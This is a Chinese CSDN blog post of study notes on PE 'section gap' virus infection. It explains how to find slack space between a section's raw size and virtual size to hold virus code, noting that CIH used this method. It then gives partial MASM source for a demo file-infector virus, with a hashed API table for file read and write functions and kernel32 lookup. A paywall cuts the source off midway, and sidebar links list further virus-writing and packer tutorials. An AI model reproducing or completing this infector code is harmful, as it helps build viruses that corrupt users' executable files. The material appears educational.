搜寻节空隙感染学习笔记

最新推荐文章于 2021-04-03 11:27:52 发布
最新推荐文章于 2021-04-03 11:27:52 发布
阅读量1.1k 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ProgrammingRing/article/details/14455185
版权

原文:http://www.pediy.com/kssd/index.html -- 病毒技术 -- 病毒知识 -- Anti Virus专题


那么搜寻节空隙感染,最重要的就是找到我们节中存在的空隙。一般在病毒技术中,有两种方法。 

  1. 循环读取节表,然后分别在每个节中搜寻00机器码(因为默认编译器是用00机器码填充的),如果此00机器码区域的大小大于病毒的体积。则取这段区域的偏移。
  2. 循环读取节表,通过节表结构中的物理文件大小 - 节映射大小 取得 节后面的物理空隙,然后判断此段空隙大小是否大于我们病毒体积,如果大于的话,则取这段区域的偏移。
  另外还有将我们病毒分段插入,这需要依靠我们的反汇编引擎,将病毒代码拆解成多个过程,然后分别插入,最后将这些过程连接起来,同样这样也有很多弊端,所以很多时候这不能使我们产生动力...。

  我们今天的代码使用的是第二种方法,因为第一种方法的弊端太多,例如如果被感染文件的空隙不是00机器码填充的等。为了稳定性还是选择第二种方法,虽然它的限制会比较多。实际上CIH利用的也是我们今天的第二种方法。


代码:

; 链接选项加入/SECTION:.text|RWE
	.386
	.model flat, stdcall
	option casemap:none
	
include windows.inc

	.code
	
VirusEntry:
	pushad
	call Dels
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>	
Table:
	   dd  038C62A7Ah
       _CreateFile  dd  0
           dd  09554EFE7h
       _GetFileSize  dd  0
           dd  00BE25545h
       _ReadFile  dd  0
           dd  0A9D1FD70h
       _SetFilePointer  dd  0
           dd  0C0D6D616h
       _CloseHandle  dd  0
           dd  0C2F6D009h
       _GlobalAlloc  dd  0
           dd  0585ED3CFh
       _GlobalFree  dd  0
           dd  058D8C545h
       _WriteFile  dd  0
           dd  0A412FD89h
       _LoadLibrary  dd  0
           dd  014D14C51h
       _MessageBox  dd  0 
       dd 0
       szCaption	db 'Virus Dream - Demo', 0
       szText		db 'Oh Yeah of Virus Dream', 0
       szFileName	db 'test.exe', 0
       nWriteByteNum	dd 0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Dels:
	pop ebp
	call GetKernel32
	
	mov edi, ebp			; edi = pHashStringList = Table
	call GetFuncAddress
	
	push '23'
	push 'resu'
	push esp			; lpFileName = user32
	call dword ptr [ebp + (_LoadLibrary - Table)]
	pop edx
	pop edx				; 弹出'user32'
	
	mov edi, ebp
	call GetFuncAddress
	
	cmp ebp, Dels - (De
最低0.47元/天 解锁文章
ProgrammingRing
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于PE病毒编写的学习(十一)——空隙覆盖病毒的实现方法
蛛丝
11-27 2025
这类病毒名字很多,选这个名字主要是它比较形象说明其感染方式,即将病毒代码分成多份,分别注入到程序各由于对齐产生的空白中。1.核心——病毒描述表  将病毒代码分割成多份,分别注入到未知地址的区域内,却能完整运行。这看似神奇,其实实现方法却很简单———建立病毒分割描述表病毒分割描述表举例(汇编):Virus_Distribution struct;病毒片段描述符   Code_Base     dword  0;该病毒片段的起始地址   Code_Length  dword  0;该病毒片段的长度Virus_
PE得到缝隙的大小
跃然实验室
06-13 411
DWORDGetSectionGapSize(PIMAGE_SECTION_HEADERs) { //此处处理并不标准,因为有可能得出负数,先不考虑这种情况 returns->SizeOfRawData -s->Misc.VirtualSize; } SizeOfRawData:物理大小 M...
PE病毒的学习资料包
06-08
PE型感染病毒 —— VC源码 PE型感染病毒 —— 遍历磁盘PE文件 (2) PE型感染病毒 —— 遍历磁盘驱动器 (1) PE型感染病毒 —— 增加点修改PE入口 (3) Win32平台下的PE文件病毒的研究及实现。rar 关于PE病毒编写的学习 关于PE病毒编写的学习(八)——定位API的N种方法 关于PE病毒编写的学习(六)——关于PE文件结构操作的程序编写 关于PE病毒编写的学习(七)——重定位的谬误和它的正确写法 关于PE病毒编写的学习(三) 关于PE病毒编写的学习(四)——关于历遍磁盘的讨论 关于PE病毒编写的学习(五)——病毒如何做标记和记录信息 关于PE病毒编写的学习
给PE文件打补我们都知道在PE文件中有很多空隙,所以我们就有可能给PE文件打补丁.
11-07
给PE文件打补,我们都知道在PE文件中有很多空隙,所以我们就有可能给PE文件打补丁. 做法是在空隙中插入我们的补丁代码. 下面我通过实例来教大家给win97的notepad.exe(记事本)程序来打个补 丁,使得notepad.exe运行时先运行我的pach.exe程序,
写壳笔记
qq_38590027的博客
04-03 480
写壳笔记 完整的项目代码: https://wws.lanzous.com/iiLa7nlxqle 密码:9ygk 前置知识: PE结构 C++编程 TEP结构 写壳的几个步骤 编写加壳器,实现在目标程序添加一个区段 在DLL项目中,编写壳代码,导出壳代码start函数,该函数执行我们对exe的加载及修复重定位,IAT等操作 将DLL区段合并到text区段,拷贝到目标程序新建的区段 设置OEP到壳代码起始位置 1.创建两个项目 加壳器程序(exe) 用于加载原程序后进行加壳工作 编
基于Java的网课学习笔记设计源码
最新发布
05-31
本项目名为"基于Java的网课学习笔记设计源码",是一个使用Java语言开发的高效学习笔记管理系统。这个系统的设计目标是为用户创造一个便捷、高效的在线学习环境,帮助他们更好地整理、记录和管理自己的学习笔记。以下...
基于gitbook的学习笔记和自用模板
02-22
这个“基于gitbook的学习笔记和自用模板”压缩包文件显然是一个集合,包含了作者个人使用Gitbook进行学习记录和模板构建的一些资源。以下是关于Gitbook及其相关知识点的详细说明: 1. **Gitbook简介**:Gitbook 是...
斯坦福机器学习笔记.zip
09-16
在过去的十年中,机器学习帮助我们自动驾驶汽车,有效的语音识别,有效的网络搜索,并极大地提高了人类基因组的认识。在本课中,将学习最有效的机器学习技术,并获得实践,让它们为自己的工作。更重要的是,不仅得到...
强化学习笔记(1)
01-06
强化学习与监督学习的区别: (1)训练数据中没有标签,只有奖励函数(Reward Function)。 (2)训练数据不是现成给定,而是由行为(Action)获得。 (3)现在的行为(Action)不仅影响后续训练数据的获得,也影响...
PE扩展方式感染
weixin_33989058的博客
11-14 138
原理是:修改最后一个并给最后一个增加长度,然后在增加的区域中间写入代码,本方法的好处是相对前面一种方法可以写入更多的代码,并且拥有更好的兼容性。。 code: CodeprogramPE_Infection;{CodeBy箫竹}{$APPTYPECONSOLE}usesSysUtils,windows,classes;constDEBUG=TRUE;...
病毒资源感染方式学习笔记
ProgrammingRing的专栏
11-15 1089
本文学习自:关于感染型病毒的那些事(三) by gaa_ra 代码也来自gaa_ra 资源感染,就是将宿主程序作为病毒程序的一个资源来保存,将附加了宿主程序的病毒程序覆盖原来的宿主程序,当打开病毒文件时,病毒发作并将宿主程序释放出来运行。 进行资源感染后,打开感染文件的过程大致如下: CreateFile创建资源文件,用于存放要被释放出来的宿主文件 --> FindResource查
浅析SMC技术
weixin_34414196的博客
02-16 422
SMC是英文Self-Modifying Code的缩写形式,顾名思义,就是“代码自修改”也就是说可以在一段代码执行之前先对它进行修改。 SMC技术在DOS时代非常流行,因为DOS时代更接近系统底层。所以即便是现在实现SMC技术,都以汇编码最为方便。 ‘利用SMC技术的这个特点,在设计加密方案时,可以把代码以加密形式保存在可执行文件中,然后在程...
kernel32基地址获得学习笔记
ProgrammingRing的专栏
09-08 7054
原文链接:点击打开链接 第一种方法 通过线程初始化时, 获得esp堆栈指针中的ExitThread函数的地址,然后通过搜索获得kernel32.dll的基地址。 线程在被初始化的时,其堆栈指针指向ExitThread函数的地址,windows这样做是为了通过ret返回时来调用ExitThread地址。所以一般我们可以在我们主线程的起始位置(也就是 程序入口点处)通过获得堆栈指针中E
如何编写病毒代码学习笔记
ProgrammingRing的专栏
09-24 3374
一些代码的优化方法: (1)测试寄存器是否为0          cmp     eax,00000000h                   ; 6 bytes     jz      bribriblibli                    ; 2 bytes (if jz is short)         optimization:          or
病毒的重定位技术学习笔记
ProgrammingRing的专栏
09-05 2470
原文链接:点击打开链接 下面的代码都是内联汇编,较比较汇编会有些限制,可能写法上有时候会不一样。黑色是代码,红色是编译的汇编代码 int g_nTest; __asm { call Dels 00401004 call 013C13A3 ; call指令会将下一句指令的地址入栈 Dels: pop ebx 004
PE结构、SEH相关知识学习笔记
ProgrammingRing的专栏
09-21 2465
本文仅是PE和SEH的一部分知识,很有很多需要学习! KSSD --> 系统篇 --> 结构化异常处理 --> SEH in ASM两篇 http://bbs.pediy.com/showthread.php?t=86657
hash扫描获得api函数地址学习笔记
ProgrammingRing的专栏
09-15 2314
下面的代码无法比较在函数名地址表中位于第一个的函数 .386 .model flat, stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc includelib user32.lib includelib kernel32.lib .cons
Solr中文学习笔记:企业级全文搜索引擎
Solr学习笔记是一份中文版的珍贵资源,对于那些希望深入理解Solr技术的开发者具有重要价值。Solr是Apache软件基金会支持的基于Lucene的开源搜索服务器,特别适合企业级应用,因为它不仅提供了强大的全文本搜索功能,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值